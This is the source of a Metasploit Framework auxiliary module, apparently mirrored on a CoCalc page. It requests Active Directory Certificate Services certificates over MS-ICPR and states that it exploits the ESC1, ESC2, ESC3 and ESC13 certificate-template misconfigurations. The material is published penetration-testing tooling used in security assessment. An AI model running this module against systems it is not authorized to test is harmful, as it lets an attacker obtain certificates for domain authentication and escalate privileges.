CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/dcerpc/icpr_cert.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'ruby_smb/dcerpc/client'

7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Exploit::Remote::MsIcpr

10
  include Msf::Exploit::Remote::SMB::Client::Authenticated

11
  include Msf::Exploit::Remote::DCERPC

12
  include Msf::Auxiliary::Report

13
  include Msf::OptionalSession::SMB

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'ICPR Certificate Management',

20
        'Description' => %q{

21
          Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate

22
          template's configuration the resulting certificate can be used for various operations such as authentication.

23
          PFX certificate files that are saved are encrypted with a blank password.

24


25
          This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Will Schroeder', # original idea/research

30
          'Lee Christensen', # original idea/research

31
          'Oliver Lyak', # certipy implementation

32
          'Spencer McIntyre'

33
        ],

34
        'References' => [

35
          [ 'URL', 'https://github.com/GhostPack/Certify' ],

36
          [ 'URL', 'https://github.com/ly4k/Certipy' ]

37
        ],

38
        'Notes' => {

39
          'Reliability' => [],

40
          'Stability' => [],

41
          'SideEffects' => [ IOC_IN_LOGS ],

42
          'AKA' => [ 'Certifry', 'Certipy' ]

43
        },

44
        'Actions' => [

45
          [ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]

46
        ],

47
        'DefaultAction' => 'REQUEST_CERT'

48
      )

49
    )

50
  end

51


52
  def run

53
    send("action_#{action.name.downcase}")

54
  rescue MsIcprConnectionError => e

55
    fail_with(Failure::Unreachable, e.message)

56
  rescue MsIcprAuthenticationError => e

57
    fail_with(Failure::NoAccess, e.message)

58
  rescue MsIcprNotFoundError => e

59
    fail_with(Failure::NotFound, e.message)

60
  rescue MsIcprUnexpectedReplyError => e

61
    fail_with(Failure::UnexpectedReply, e.message)

62
  rescue MsIcprUnknownError => e

63
    fail_with(Failure::Unknown, e.message)

64
  end

65


66
  def action_request_cert

67
    with_ipc_tree do |opts|

68
      request_certificate(opts)

69
    end

70
  end

71


72
  # @yieldparam options [Hash] If a SMB session is present, a hash with the IPC tree present. Empty hash otherwise.

73
  # @return [void]

74
  def with_ipc_tree

75
    opts = {}

76
    if session

77
      print_status("Using existing session #{session.sid}")

78
      client = session.client

79
      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)

80
      opts[:tree] = simple.client.tree_connect("\\\\#{client.dispatcher.tcp_socket.peerhost}\\IPC$")

81
    end

82


83
    yield opts

84
  ensure

85
    opts[:tree].disconnect! if opts[:tree]

86
  end

87
end

88


89